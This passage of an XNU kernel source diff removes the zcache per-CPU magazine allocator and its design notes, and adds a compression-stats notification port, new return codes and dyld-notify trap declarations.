-       struct zcc_per_cpu_cache *pcpu_caches;
-       struct zcc_depot         *depot;
-       vm_size_t size;
-
-       /*
-        * If zcache hasn't been initialized yet, remember our decision,
-        *
-        * zcache_init() will be called again by zcache_bootstrap(),
-        * while the system is still single threaded, to build the missing caches.
-        */
-       if (!zcache_ready()) {
-               zone->cpu_cache_enabled = true;
-               return;
-       }
-
-       /* Allocate chunk of memory for all structs */
-       size        = sizeof(struct zcc_depot) + (depot_element_count * sizeof(void *));
-       depot       = zalloc_permanent(size, ZALIGN_PTR);
-
-       size        = sizeof(struct zcc_per_cpu_cache);
-       pcpu_caches = zalloc_percpu_permanent(size, ZALIGN_PTR);
-
-       /* Initialize a cache for every CPU */
-       zpercpu_foreach(cache, pcpu_caches) {
-               cache->current = zcache_mag_alloc();
-               cache->previous = zcache_mag_alloc();
-               cache->zp_count = zone_poison_count_init(zone);
-       }
-
-       /* Initialize empty magazines in the depot list */
-       for (int i = 0; i < depot_element_count; i++) {
-               depot->zcc_depot_list[i] = zcache_mag_alloc();
-       }
-
-       lock_zone(zone);
-       if (zone->zcache.zcc_depot) {
-               panic("allocating caches for zone %s twice", zone->z_name);
-       }
-
-       /* Make the initialization of the per-cpu magazines visible. */
-       os_atomic_thread_fence(release);
-
-       zone->zcache.zcc_depot = depot;
-       zone->zcache.zcc_pcpu = pcpu_caches;
-       zone->cpu_cache_enabled = true;
-       unlock_zone(zone);
-}
-
-/*
- * zcache_drain_depot
- *
- * Frees all the full magazines from the depot layer to the zone allocator as part
- * of zone_gc(). The routine assumes that only one zone_gc() is in progress (zone_gc_lock
- * ensures that)
- *
- * Parameters:
- * zone    pointer to zone for which the depot layer needs to be drained
- *
- * Returns: None
- *
- */
-void
-zcache_drain_depot(zone_t zone)
-{
-       struct zcc_depot *depot;
-       int drain_depot_index = 0;
-
-       lock_zone(zone);
-       depot = zone->zcache.zcc_depot;
-       drain_depot_index = depot->zcc_depot_index;
-       for (int i = 0; i < drain_depot_index; i++) {
-               zcache_mag_drain_locked(zone, depot->zcc_depot_list[i]);
-       }
-#if ZALLOC_DETAILED_STATS
-       depot->zcc_gc += drain_depot_index;
-#endif /* ZALLOC_DETAILED_STATS */
-       depot->zcc_depot_index = 0;
-       unlock_zone(zone);
-}
-
-__attribute__((noinline))
-static void
-zcache_free_to_cpu_cache_slow(zone_t zone, struct zcc_per_cpu_cache *per_cpu_cache)
-{
-       struct zcc_depot *depot;
-
-       lock_zone(zone);
-       depot = zone->zcache.zcc_depot;
-       if (depot->zcc_depot_index < depot_element_count) {
-               /* If able, rotate in a new empty magazine from the depot and retry */
-               zcache_mag_depot_swap_for_free(depot, per_cpu_cache);
-       } else {
-               /* Free an entire magazine of elements */
-               zcache_mag_drain_locked(zone, per_cpu_cache->current);
-#if ZALLOC_DETAILED_STATS
-               depot->zcc_drain++;
-#endif /* ZALLOC_DETAILED_STATS */
-       }
-       unlock_zone(zone);
-}
-
-
-void
-zcache_free_to_cpu_cache(zone_t zone, zone_stats_t zstats, vm_offset_t addr)
-{
-       struct zcc_per_cpu_cache *per_cpu_cache;
-       vm_offset_t elem = addr;
-       int cpu;
-
-       zone_allocated_element_validate(zone, elem);
-
-       /*
-        * This is racy but we don't need zp_count to be accurate.
-        * This allows us to do the poisoning with preemption enabled.
-        */
-       per_cpu_cache = zpercpu_get(zone->zcache.zcc_pcpu);
-       if (zfree_clear_or_poison(zone, &per_cpu_cache->zp_count, elem)) {
-               addr |= ZALLOC_ELEMENT_NEEDS_VALIDATION;
-       } else {
-               zcache_canary_add(zone, elem);
-       }
-
-#if KASAN_ZALLOC
-       kasan_poison_range(elem, zone_elem_size(zone), ASAN_HEAP_FREED);
-#endif
-
-       disable_preemption();
-       cpu = cpu_number();
-       per_cpu_cache = zpercpu_get_cpu(zone->zcache.zcc_pcpu, cpu);
-
-       if (zcache_mag_has_space(per_cpu_cache->current)) {
-               /* If able, free into current magazine */
-       } else if (zcache_mag_has_space(per_cpu_cache->previous)) {
-               /* If able, swap current and previous magazine and retry */
-               zcache_swap_magazines(&per_cpu_cache->previous, &per_cpu_cache->current);
-       } else {
-               zcache_free_to_cpu_cache_slow(zone, per_cpu_cache);
-       }
-
-       struct zcc_magazine *mag = per_cpu_cache->current;
-       mag->zcc_elements[mag->zcc_magazine_index++] = addr;
-       zpercpu_get_cpu(zstats, cpu)->zs_mem_freed += zone_elem_size(zone);
-#if ZALLOC_DETAILED_STATS
-       per_cpu_cache->zcc_frees++;
-#endif /* ZALLOC_DETAILED_STATS */
-
-       enable_preemption();
-}
-
-__attribute__((noinline))
-static bool
-zcache_alloc_from_cpu_cache_slow(zone_t zone, struct zcc_per_cpu_cache *per_cpu_cache)
-{
-       struct zcc_depot *depot;
-
-       lock_zone(zone);
-       depot = zone->zcache.zcc_depot;
-       if (depot->zcc_depot_index > 0) {
-               /* If able, rotate in a full magazine from the depot */
-               zcache_mag_depot_swap_for_alloc(depot, per_cpu_cache);
-       } else if (zcache_mag_fill_locked(zone, per_cpu_cache->current)) {
-#if ZALLOC_DETAILED_STATS
-               depot->zcc_fill++;
-#endif /* ZALLOC_DETAILED_STATS */
-       } else {
-#if ZALLOC_DETAILED_STATS
-               depot->zcc_fail++;
-#endif /* ZALLOC_DETAILED_STATS */
-               /* If unable to allocate from cache return NULL and fall through to zalloc */
-               unlock_zone(zone);
-               enable_preemption();
-               return false;
-       }
-       unlock_zone(zone);
-
-       return true;
-}
-
-vm_offset_t
-zcache_alloc_from_cpu_cache(zone_t zone, zone_stats_t zstats, vm_size_t waste)
-{
-       struct zcc_per_cpu_cache *per_cpu_cache;
-       int cpu;
-
-       disable_preemption();
-       cpu = cpu_number();
-       per_cpu_cache = zpercpu_get_cpu(zone->zcache.zcc_pcpu, cpu);
-
-       if (zcache_mag_has_elements(per_cpu_cache->current)) {
-               /* If able, allocate from current magazine */
-       } else if (zcache_mag_has_elements(per_cpu_cache->previous)) {
-               /* If able, swap current and previous magazine and retry */
-               zcache_swap_magazines(&per_cpu_cache->previous, &per_cpu_cache->current);
-       } else if (!zcache_alloc_from_cpu_cache_slow(zone, per_cpu_cache)) {
-               return (vm_offset_t)NULL;
-       }
-
-       struct zcc_magazine *mag = per_cpu_cache->current;
-       vm_offset_t elem_size = zone_elem_size(zone);
-       uint32_t index = --mag->zcc_magazine_index;
-       vm_offset_t addr = mag->zcc_elements[index];
-       mag->zcc_elements[index] = 0;
-       zpercpu_get_cpu(zstats, cpu)->zs_mem_allocated += elem_size;
-#if ZALLOC_DETAILED_STATS
-       if (waste) {
-               zpercpu_get_cpu(zstats, cpu)->zs_mem_wasted += waste;
-       }
-       per_cpu_cache->zcc_allocs++;
-#else
-       (void)waste;
-#endif /* ZALLOC_DETAILED_STATS */
-
-       enable_preemption();
-
-#if ZALLOC_ENABLE_POISONING
-       bool validate = addr & ZALLOC_ELEMENT_NEEDS_VALIDATION;
-#endif /* ZALLOC_ENABLE_POISONING */
-
-       addr &= ~ZALLOC_ELEMENT_NEEDS_VALIDATION;
-
-#if KASAN_ZALLOC
-       kasan_poison_range(addr, elem_size, ASAN_VALID);
-#endif
-#if ZALLOC_ENABLE_POISONING
-       if (!validate) {
-               vm_offset_t backup = addr + elem_size - sizeof(vm_offset_t);
-               zcache_validate_and_clear_canary(zone, (vm_offset_t *)addr,
-                   (vm_offset_t *)backup);
-       }
-       zalloc_validate_element(zone, addr, elem_size, validate);
-#endif /* ZALLOC_ENABLE_POISONING */
-
-       return addr;
-}
-
-
-/*
- * zcache_mag_fill_locked
- *
- * Fills a magazine with as many elements as the zone can give
- * without blocking to carve out more memory
- *
- * Parameters:
- * zone    zone from which to allocate
- * mag     pointer to magazine to fill
- *
- * Return:     True if able to allocate elements, false is mag is still empty
- */
-static bool
-zcache_mag_fill_locked(zone_t zone, struct zcc_magazine *mag)
-{
-       uint32_t i = mag->zcc_magazine_index;
-       uint32_t end = mag->zcc_magazine_capacity;
-       vm_offset_t elem, addr;
-
-       while (i < end && zone->countfree) {
-               addr = zalloc_direct_locked(zone, Z_NOWAIT, 0);
-               elem = addr & ~ZALLOC_ELEMENT_NEEDS_VALIDATION;
-               if (addr & ZALLOC_ELEMENT_NEEDS_VALIDATION) {
-                       zone_clear_freelist_pointers(zone, elem);
-               } else {
-                       zcache_canary_add(zone, elem);
-               }
-#if KASAN_ZALLOC
-               kasan_poison_range(elem, zone_elem_size(zone), ASAN_HEAP_FREED);
-#endif
-               mag->zcc_elements[i++] = addr;
-       }
-
-       mag->zcc_magazine_index = i;
-
-       return i != 0;
-}
-
-/*
- * zcache_mag_drain_locked
- *
- * Frees all elements in a magazine
- *
- * Parameters:
- * zone   zone to which elements will be freed
- * mag    pointer to magazine to empty
- *
- */
-static void
-zcache_mag_drain_locked(zone_t zone, struct zcc_magazine *mag)
-{
-       vm_offset_t elem, addr;
-       bool poison;
-
-       for (uint32_t i = 0, end = mag->zcc_magazine_index; i < end; i++) {
-               addr   = mag->zcc_elements[i];
-               poison = addr & ZALLOC_ELEMENT_NEEDS_VALIDATION;
-               elem   = addr & ~ZALLOC_ELEMENT_NEEDS_VALIDATION;
-
-#if ZALLOC_ENABLE_POISONING
-               zcache_validate_element(zone, (vm_offset_t *)elem, poison);
-#endif /* ZALLOC_ENABLE_POISONING */
-               zfree_direct_locked(zone, elem, poison);
-               mag->zcc_elements[i] = 0;
-       }
-       mag->zcc_magazine_index = 0;
-}
-
-
-/*
- * zcache_mag_has_space
- *
- * Checks if magazine still has capacity
- *
- * Parameters:
- * mag    pointer to magazine to check
- *
- * Returns: true if magazine is full
- *
- */
-static bool
-zcache_mag_has_space(struct zcc_magazine *mag)
-{
-       return mag->zcc_magazine_index < mag->zcc_magazine_capacity;
-}
-
-
-/*
- * zcache_mag_has_elements
- *
- * Checks if magazine is empty
- *
- * Parameters:
- * mag    pointer to magazine to check
- *
- * Returns: true if magazine has no elements
- *
- */
-static bool
-zcache_mag_has_elements(struct zcc_magazine *mag)
-{
-       return mag->zcc_magazine_index > 0;
-}
-
-
-/*
- * zcache_swap_magazines
- *
- * Function which swaps two pointers of any type
- *
- * Parameters:
- * a           pointer to first pointer
- * b           pointer to second pointer
- */
-static void
-zcache_swap_magazines(struct zcc_magazine **a, struct zcc_magazine **b)
-{
-       struct zcc_magazine *temp = *a;
-       *a = *b;
-       *b = temp;
-}
-
-
-/*
- * zcache_mag_depot_swap_for_alloc
- *
- * Swaps a full magazine into the current position
- *
- * Parameters:
- * depot     pointer to the depot
- * cache     pointer to the current per-cpu cache
- *
- * Precondition: Check that the depot list has full elements
- */
-static void
-zcache_mag_depot_swap_for_alloc(struct zcc_depot *depot, struct zcc_per_cpu_cache *cache)
-{
-       /* Loads a full magazine from which we can allocate */
-       assert(depot->zcc_depot_index > 0);
-       depot->zcc_depot_index--;
-#if ZALLOC_DETAILED_STATS
-       depot->zcc_swap++;
-#endif /* ZALLOC_DETAILED_STATS */
-       zcache_swap_magazines(&cache->current, &depot->zcc_depot_list[depot->zcc_depot_index]);
-}
-
-
-/*
- * zcache_mag_depot_swap_for_free
- *
- * Swaps an empty magazine into the current position
- *
- * Parameters:
- * depot     pointer to the depot
- * cache     pointer to the current per-cpu cache
- *
- * Precondition: Check that the depot list has empty elements
- */
-static void
-zcache_mag_depot_swap_for_free(struct zcc_depot *depot, struct zcc_per_cpu_cache *cache)
-{
-       /* Loads an empty magazine into which we can free */
-       assert(depot->zcc_depot_index < depot_element_count);
-       zcache_swap_magazines(&cache->current, &depot->zcc_depot_list[depot->zcc_depot_index]);
-#if ZALLOC_DETAILED_STATS
-       depot->zcc_swap++;
-#endif /* ZALLOC_DETAILED_STATS */
-       depot->zcc_depot_index++;
-}
-
-/*
- * zcache_canary_add
- *
- * Adds a canary to an element by putting zcache_canary at the first
- * and last location of the element
- *
- * Parameters:
- * zone    zone for the element
- * addr    element address to add canary to
- */
-static void
-zcache_canary_add(zone_t zone, vm_offset_t element)
-{
-#if ZALLOC_ENABLE_POISONING
-       vm_offset_t *primary = (vm_offset_t *)element;
-       vm_offset_t *backup = (vm_offset_t *)((vm_offset_t)primary +
-           zone_elem_size(zone) - sizeof(vm_offset_t));
-       *primary = *backup = (zcache_canary ^ (uintptr_t)element);
-#else
-#pragma unused(zone, element)
-#endif
-}
-
-#if ZALLOC_ENABLE_POISONING
-__abortlike static void
-zcache_validation_panic(zone_t zone, vm_offset_t *primary, vm_offset_t *backup,
-    vm_offset_t permutation)
-{
-       vm_offset_t primary_value = 0;
-       vm_offset_t backup_value = 0;
-
-       if (permutation == zcache_canary) {
-               primary_value = *primary ^ (vm_offset_t)primary;
-               backup_value = *backup ^ (vm_offset_t)primary;
-               permutation = permutation ^ (vm_offset_t)primary;
-       } else {
-               primary_value = *primary;
-               backup_value = *backup;
-       }
-       if (primary_value != permutation) {
-               panic("Zone cache element was used after free! Element %p was corrupted at "
-                   "beginning; Expected 0x%lx but found 0x%lx; canary 0x%lx; zone %p (%s%s)",
-                   primary, (uintptr_t) permutation, (uintptr_t) *primary, zcache_canary, zone,
-                   zone_heap_name(zone), zone->z_name);
-       } else {
-               panic("Zone cache element was used after free! Element %p was corrupted at end; "
-                   "Expected 0x%lx but found 0x%lx; canary 0x%lx; zone %p (%s%s)",
-                   primary, (uintptr_t) permutation, (uintptr_t) *backup, zcache_canary, zone,
-                   zone_heap_name(zone), zone->z_name);
-       }
-}
-
-/*
- * zcache_validate_and_clear_canary
- *
- * Validates an element of the zone cache to make sure it still contains the zone
- * caching canary and clears it.
- *
- * Parameters:
- * zone    zone for the element
- * primary addr of canary placed in front
- * backup       addr of canary placed at the back
- */
-static void
-zcache_validate_and_clear_canary(zone_t zone, vm_offset_t *primary, vm_offset_t *backup)
-{
-       vm_offset_t primary_value = (*primary ^ (uintptr_t)primary);
-       vm_offset_t backup_value = (*backup ^ (uintptr_t)primary);
-
-       if (primary_value == zcache_canary && backup_value == zcache_canary) {
-               *primary = *backup = ZONE_POISON;
-       } else {
-               zcache_validation_panic(zone, primary, backup, zcache_canary);
-       }
-}
-
-/*
- * zcache_validate_element
- *
- * Validates the first and last pointer size of the element to ensure
- * that they haven't been altered. This function is used when an
- * element moves from cache to zone, therefore only validing the
- * first and last pointer size (location of future freelist pointers).
- *
- * Parameters:
- * zone    zone for the element
- * element addr of element to validate
- * poison  has the element been poisoned
- */
-static void
-zcache_validate_element(zone_t zone, vm_offset_t *element, bool poison)
-{
-       vm_offset_t *primary = (vm_offset_t *)element;
-       vm_offset_t *backup = (vm_offset_t *)((vm_offset_t)primary +
-           zone_elem_size(zone) - sizeof(vm_offset_t));
-
-       if (zone->zfree_clear_mem) {
-               if (*primary == 0 && *backup == 0) {
-                       return;
-               } else {
-                       zcache_validation_panic(zone, primary, backup, 0);
-               }
-       }
-
-       if (__probable(!poison)) {
-               zcache_validate_and_clear_canary(zone, primary, backup);
-       } else {
-               if (*primary == ZONE_POISON && *backup == ZONE_POISON) {
-                       return;
-               } else {
-                       zcache_validation_panic(zone, primary, backup, ZONE_POISON);
-               }
-       }
-}
-#endif /* ZALLOC_ENABLE_POISONING */
diff --git a/osfmk/kern/zcache_internal.h b/osfmk/kern/zcache_internal.h
deleted file mode 100644 (file)
index 2cafb52..0000000
+++ /dev/null
@@ -1,206 +0,0 @@
-/*
- * Copyright (c) 2017-2020 Apple Inc. All rights reserved.
- *
- * @APPLE_OSREFERENCE_LICENSE_HEADER_START@
- *
- * This file contains Original Code and/or Modifications of Original Code
- * as defined in and that are subject to the Apple Public Source License
- * Version 2.0 (the 'License'). You may not use this file except in
- * compliance with the License. The rights granted to you under the License
- * may not be used to create, or enable the creation or redistribution of,
- * unlawful or unlicensed copies of an Apple operating system, or to
- * circumvent, violate, or enable the circumvention or violation of, any
- * terms of an Apple operating system software license agreement.
- *
- * Please obtain a copy of the License at
- * http://www.opensource.apple.com/apsl/ and read it before using this file.
- *
- * The Original Code and all software distributed under the License are
- * distributed on an 'AS IS' basis, WITHOUT WARRANTY OF ANY KIND, EITHER
- * EXPRESS OR IMPLIED, AND APPLE HEREBY DISCLAIMS ALL SUCH WARRANTIES,
- * INCLUDING WITHOUT LIMITATION, ANY WARRANTIES OF MERCHANTABILITY,
- * FITNESS FOR A PARTICULAR PURPOSE, QUIET ENJOYMENT OR NON-INFRINGEMENT.
- * Please see the License for the specific language governing rights and
- * limitations under the License.
- *
- * @APPLE_OSREFERENCE_LICENSE_HEADER_END@
- */
-/*
- *      Below is a diagram of the caching system. This design is based of the
- * paper "Magazines and Vmem: Extending the Slab Allocator to Many CPUs and
- * Arbitrary Resources" by Jeff Bonwick and Jonathan Adams. It is divided into 3
- * layers: the Per-cpu Layer, the Depot Layer, and the Zone Allocator. The
- * Per-CPU and Depot layers store elements using arrays we call magazines.
- *
- *      Magazines function like a stack (we push and pop elements) and can be
- *  moved around for bulk operations.
- *  _________         _________         _________
- * |  CPU 1  |       |  CPU 2  |       |  CPU 3  |
- * |  _   _  |       |  _   _  |       |  _   _  |
- * | |#| | | |       | | | |#| |       | |#| |#| |        Per-CPU Layer
- * | |#| |_| |       | |_| |#| |       | |#| |#| |
- * |_________|       |_________|       |_________|
- *
- *  ______________________________________________
- * |            _   _   _   _   _   _             |
- * |           |#| |#| |#| | | | | | |            |     Depot Layer
- * |           |#| |#| |#| |_| |_| |_|            |
- * |______________________________________________|
- *
- *  _______________________________________________
- * | # | # | # | # | # | # | # | # | # | # | # | # |   Zone Allocator
- * |_______________________________________________|
- *
- *     The top layer is the per-cpu cache and consists of a current and
- * previous magazine for each CPU. The current magazine is the one we always try
- * to allocate from and free to first. Only if we are unable, do we check the
- * previous magazine. If the previous magazine can satisfy the allocate or free,
- * then we switch the two and allocate from the new current magazine. This layer
- * requires no locking, so we can access multiple CPU's caches concurrently.
- * This is the main source of the speedup.
- *
- *      We have two magazines here to prevent thrashing when swapping magazines
- * with the depot layer. If a certain pattern of alloc and free are called we
- * can waste a lot of time swapping magazines to and from the depot layer. We
- * prevent this by dividing the per-cpu cache into two separate magazines.
- *
- *     The middle layer is the magazine depot. This layer consists of a
- * collection of full and empty magazines. These are used to reload the per-cpu
- * caches when needed. This is implemented as an array of magazines which are
- * initially all empty and as we fill up magazines we increment the index to
- * point at the first empty magazine. Since this layer is per-zone, it allows us
- *  to balance the cache between cpus, but does require taking a lock.
- *
- *      When neither the current nor previous magazine for a given CPU can
- * satisfy the free or allocation, we look to the depot layer. If there are
- * magazines in the depot that can satisfy the free or allocation we swap
- * that magazine into the current position. In the example below, to allocate on
- * the given CPU we must lock the depot layer and swap magazine A with magazine
- * B and decrement the depot index.
- *
- *      _____________________       _______________________________________
- *     |    Per-CPU Cache    |     |              Depot Layer              |
- *     |                     |     |                                       |
- *     |   A___      ____    |     |   ____      B___      ____      ____  |
- *     |  |    |    |    |   |     |  | ## |    | ## |    |    |    |    | |
- *     |  |    |    |    |   |     |  | ## |    | ## |    |    |    |    | |
- *     |  |    |    |    |   |     |  | ## |    | ## |    |    |    |    | |
- *     |  |    |    |    |   |     |  | ## |    | ## |    |    |    |    | |
- *     |  |____|    |____|   |     |  |_##_|    |_##_|    |____|    |____| |
- *     | Current   Previous  |     |                                       |
- *     |_____________________|     |_______________________________________|
- *
- *     The bottom layer is the Zone Allocator. This is already implemented in
- *  XNU and will remain mostly unchanged. Implementation for this can be found
- * in zalloc.c and zalloc.h. We will only use the zone if all other layers are
- * unable to satisfy the allocation or free. When we do use the zone, we will
- * try to allocate an entire magazine of elements or free an entire magazine of
- * elements at once.
- *
- *      Caching must be enabled explicitly, by calling zone_create() with the
- * ZC_CACHING flag, for every zone you want to cache elements for. Zones
- * which are good candidates for this are ones with highly contended zone locks.
- *
- * Some good potential candidates are kalloc.16, kalloc.48, Vm objects, VM map
- * entries, ipc vouchers, and ipc ports.
- *
- *
- * Some factors can be tuned by boot-arg:
- *  zcc_enable_for_zone_name    name of a single zone to enable caching for
- *                             (replace space characters with '.')
- *
- *  zcc_magazine_element_count integer value for magazine size used for all
- *                             zones (default 8 is used if not specified)
- *
- *  zcc_depot_element_count    integer value for how many full and empty
- *                             magazines to store in the depot, if N specified
- *                             depot will have N full and N empty magazines
- *                             (default 16 used if not specified)
- */
-
-#ifndef _KERN_ZCACHE_H_
-#define _KERN_ZCACHE_H_
-
-#include <kern/kern_types.h>
-#include <kern/zalloc.h> /* zone_stats_t */
-#include <vm/vm_kern.h>
-
-#if CONFIG_ZCACHE
-#pragma GCC visibility push(hidden)
-
-__BEGIN_DECLS
-
-struct zone_cache {
-       struct zcc_per_cpu_cache *__zpercpu zcc_pcpu;
-       struct zcc_depot         *zcc_depot;
-};
-
-/**
- * @function zcache_init
- *
- * @abstract
- * Initializes all parts of the per-cpu caches for a given zone
- *
- * @param zone      pointer to zone on which to iniitalize caching
- *
- */
-extern void zcache_init(
-       zone_t          zone);
-
-
-/**
- * @function zcache_free_to_cpu_cache()
- *
- * @abstract
- * Checks per-cpu caches to free element there if possible.
- *
- * @discussion
- * The caller is responsible for checking that caching is enabled for zone.
- *
- * @param zone      pointer to zone for which element comes from
- * @param zstats    pointer to the per-cpu statistics to maintain
- * @param addr      adddress of the element to free
- */
-extern void zcache_free_to_cpu_cache(
-       zone_t          zone,
-       zone_stats_t    zstats,
-       vm_offset_t     addr);
-
-
-/**
- * @function zcache_alloc_from_cpu_cache
- *
- * @abstract
- * Checks per-cpu caches to allocate element from there if possible
- *
- * @discussion
- * The caller is responsible for checking that caching is enabled for zone.
- *
- * @param zone      pointer to zone for which element will comes from
- * @param zstats    pointer to the per-cpu statistics to maintain
- * @param waste     amount of waste of this allocation (or 0)
- *
- * @return          pointer to usable element
- */
-extern vm_offset_t zcache_alloc_from_cpu_cache(
-       zone_t          zone,
-       zone_stats_t    zstats,
-       vm_size_t       waste);
-
-/**
- * @function zcache_drain_depot
- *
- * @abstract
- * Frees all the full magazines from the depot layer to the zone allocator
- * Invoked by zone_gc()
- *
- * @param zone      pointer to zone for which the depot layer needs to be drained
- */
-extern void zcache_drain_depot(
-       zone_t          zone);
-
-__END_DECLS
-
-#pragma GCC visibility pop
-#endif /*  CONFIG_ZCACHE */
-#endif /* _KERN_ZCACHE_H_ */
index 08d6d75119fcafbbc09a58551a0f9b65649da105..516ab1443700ca792ba72c2af3b21ceaffe117d9 100644 (file)
@@ -64,7 +64,8 @@ MACH_PRIVATE_DEFS = \
        sysdiagnose_notification.defs \
        upl.defs \
        vfs_nspace.defs \
-       vm32_map.defs
+       vm32_map.defs \
+       iocompressionstats_notification.defs
 
 #
 # MIG-generated headers that are traditionally used by user
@@ -83,6 +84,7 @@ MIG_USHDRS = \
        task_access_server.h \
        telemetry_notification_server.h \
        sysdiagnose_notification_server.h \
+       iocompressionstats_notification_server.h \
        vfs_nspace_server.h
 
 MIG_UUHDRS = \
@@ -183,6 +185,7 @@ PRIVATE_DATAFILES = \
        coalition.h \
        coalition_notification.defs \
        fairplayd_notification.defs \
+       iocompressionstats_notification.defs \
        arcade_upcall.defs \
        host_info.h \
        ktrace_background.defs \
@@ -305,6 +308,7 @@ MIG_KUSRC = \
        resource_notify_user.c \
        task_access_user.c \
        telemetry_notification_user.c \
+       iocompressionstats_notification_user.c \
        upl_user.c \
        vfs_nspace_user.c \
        vm_map_user.c \
index b81e5494411c6bfff4ba9d0d40013e8a83d85075..7102db36941bdb048727658265ee873b2e1237b8 100644 (file)
@@ -30,3 +30,4 @@
 
 #define MACH_ARM_TRAP_ABSTIME -3
 #define MACH_ARM_TRAP_CONTTIME -4
+
index 31ee691b747c9c42a121d44aef7453fa4375e485..2f9f7274d2b79123ae80a0198809591f01ae58a2 100644 (file)
 #include <mach/port.h>
 #include <mach/thread_status.h>
 #include <mach/machine/vm_types.h>
+#include <mach_debug/ipc_info.h>
 /*
  * Exported types
  */
@@ -199,6 +200,7 @@ typedef exception_mask_t                *exception_mask_array_t;
 typedef exception_behavior_t            *exception_behavior_array_t;
 typedef thread_state_flavor_t           *exception_flavor_array_t;
 typedef mach_port_t                     *exception_port_array_t;
+typedef ipc_info_port_t                 *exception_port_info_array_t;
 typedef mach_exception_data_type_t      mach_exception_code_t;
 typedef mach_exception_data_type_t      mach_exception_subcode_t;
 
index d09b44b6b624b9fe1dcf928953ddd0819390130d..75ba5e69dc1535dbf3db9b8b8c1901fc1b7e0517 100644 (file)
 #define HOST_SYSPOLICYD_PORT            (22 + HOST_MAX_SPECIAL_KERNEL_PORT)
 #define HOST_FILECOORDINATIOND_PORT     (23 + HOST_MAX_SPECIAL_KERNEL_PORT)
 #define HOST_FAIRPLAYD_PORT             (24 + HOST_MAX_SPECIAL_KERNEL_PORT)
+#define HOST_IOCOMPRESSIONSTATS_PORT    (25 + HOST_MAX_SPECIAL_KERNEL_PORT)
 
-#define HOST_MAX_SPECIAL_PORT           HOST_FAIRPLAYD_PORT
-/* MAX = last since rdar://35861175 */
+#define HOST_MAX_SPECIAL_PORT           HOST_IOCOMPRESSIONSTATS_PORT
+/* MAX = last since rdar://59872249 */
 
 /* obsolete name */
 #define HOST_CHUD_PORT HOST_LAUNCHCTL_PORT
 #define host_set_fairplayd_port(host, port)     \
        (host_set_special_port((host), HOST_FAIRPLAYD_PORT, (port)))
 
+#define host_get_iocompressionstats_port(host, port)     \
+       (host_get_special_port((host),                  \
+       HOST_LOCAL_NODE, HOST_IOCOMPRESSIONSTATS_PORT, (port)))
+#define host_set_iocompressionstats_port(host, port)     \
+       (host_set_special_port((host), HOST_IOCOMPRESSIONSTATS_PORT, (port)))
+
+
 /* HOST_RESOURCE_NOTIFY_PORT doesn't #defines these conveniences.
  *  All lookups go through send_resource_violation()
  */
diff --git a/osfmk/mach/iocompressionstats_notification.defs b/osfmk/mach/iocompressionstats_notification.defs
new file mode 100644 (file)
index 0000000..a46c314
--- /dev/null
@@ -0,0 +1,20 @@
+/*
+ * Copyright (c) 2020, Apple Inc.  All rights reserved.
+ */
+
+ /*
+ *  Interface definition for the telemetry facility.
+ */
+
+subsystem
+#if    KERNEL_USER
+    KernelUser
+#endif /* KERNEL_USER */
+    iocompressionstats_notification 5600;
+
+#include <mach/std_types.defs>
+#include <mach/mach_types.defs>
+
+simpleroutine  iocompressionstats_notification(
+       RequestPort     iocompressionstats_port : mach_port_t;
+       in                      flags                   : uint32_t);
index d3218260086525cb87b44b15f079ba0cf0961015..addc157f14480037f77a51649d89d306f7e63c24 100644 (file)
 /* Denied by security policy
  */
 
+#define KERN_MISSING_KC                 54
+/* The KC on which the function is operating is missing
+ */
+
+#define KERN_INVALID_KC                 55
+/* The KC on which the function is operating is invalid
+ */
+
 #define KERN_RETURN_MAX                 0x100
 /* Maximum return value allowable
  */
index b7a9bdd1c65f66a526691eb18ced8b0dbd8087e9..7341d83d24984c8072809ca08095def664d1a7ee 100644 (file)
@@ -162,6 +162,11 @@ extern kern_return_t _kernelrpc_mach_vm_deallocate_trap(
        mach_vm_size_t size
        );
 
+extern kern_return_t task_dyld_process_info_notify_get(
+       mach_port_name_array_t names_addr,
+       natural_t *names_count_addr
+       );
+
 extern kern_return_t _kernelrpc_mach_vm_protect_trap(
        mach_port_name_t target,
        mach_vm_address_t address,
@@ -662,6 +667,14 @@ struct _kernelrpc_mach_vm_deallocate_args {
 extern kern_return_t _kernelrpc_mach_vm_deallocate_trap(
        struct _kernelrpc_mach_vm_deallocate_args *args);
 
+struct task_dyld_process_info_notify_get_trap_args {
+       PAD_ARG_(mach_vm_address_t, names_addr);     /* 2 words */
+       PAD_ARG_(mach_vm_address_t, names_count_addr);  /* 2 words */
+};                                               /* Total: 4 */
+
+extern kern_return_t task_dyld_process_info_notify_get_trap(
+       struct task_dyld_process_info_notify_get_trap_args *args);
+
 struct _kernelrpc_mach_vm_protect_args {
        PAD_ARG_(mach_port_name_t, target);     /* 1 word */
        PAD_ARG_(mach_vm_address_t, address);   /* 2 words */
index 25e03e78404b50f090af7c16988acc673f419401..8ef422d352d0fd5a75f9a2f3af0f682c58c385aa 100644 (file)
@@ -168,6 +168,14 @@ type task_read_t = mach_port_t
 #endif /* KERNEL_SERVER */
                ;
 
+type task_id_token_t = mach_port_t
+#if KERNEL_SERVER
+               intran: task_id_token_t convert_port_to_task_id_token(mach_port_t)
+               outtran: mach_port_t convert_task_id_token_to_port(task_id_token_t)
+               destructor: task_id_token_release(task_id_token_t)
+#endif /* KERNEL_SERVER */
+               ;
+
 type thread_t = mach_port_t
 #if    KERNEL_SERVER
                intran: thread_t convert_port_to_thread(mach_port_t)
@@ -578,9 +586,14 @@ type exception_behavior_t  = int;
 
 type    exception_handler_t = mach_port_t;
 
+type    exception_handler_info_t = struct[2] of natural_t;
+
 type   exception_handler_array_t       =
                        array[*:32] of exception_handler_t;
 
+type    exception_handler_info_array_t =
+                       array[*:32] of exception_handler_info_t;
+
 type   exception_behavior_array_t      =
                        array[*:32] of exception_behavior_t;
 
@@ -716,24 +729,25 @@ type dyld_kernel_process_info_t = struct[64] of MACH_MSG_TYPE_BYTE;
 #ifdef MACH_KERNEL_PRIVATE
 simport <ipc/ipc_voucher.h>;   /* for voucher conversions */
 simport <kern/ipc_kobject.h>;  /* for null conversion */
-simport <kern/ipc_tt.h>;       /* for task/thread conversion */
-simport <kern/ipc_host.h>;     /* for host/processor/pset conversions */
+simport <kern/ipc_tt.h>;           /* for task/thread conversion */
+simport <kern/ipc_host.h>;         /* for host/processor/pset conversions */
 simport <kern/ipc_sync.h>;      /* for lock_set and semaphore conversions */
-simport <kern/ledger.h>;       /* for ledger conversions */
-simport <kern/processor.h>;    /* for processor conversions */
-simport <kern/sync_lock.h>;    /* for lock-set conversions */
-simport <kern/sync_sema.h>;    /* for semaphore conversions */
+simport <kern/ledger.h>;           /* for ledger conversions */
+simport <kern/processor.h>;        /* for processor conversions */
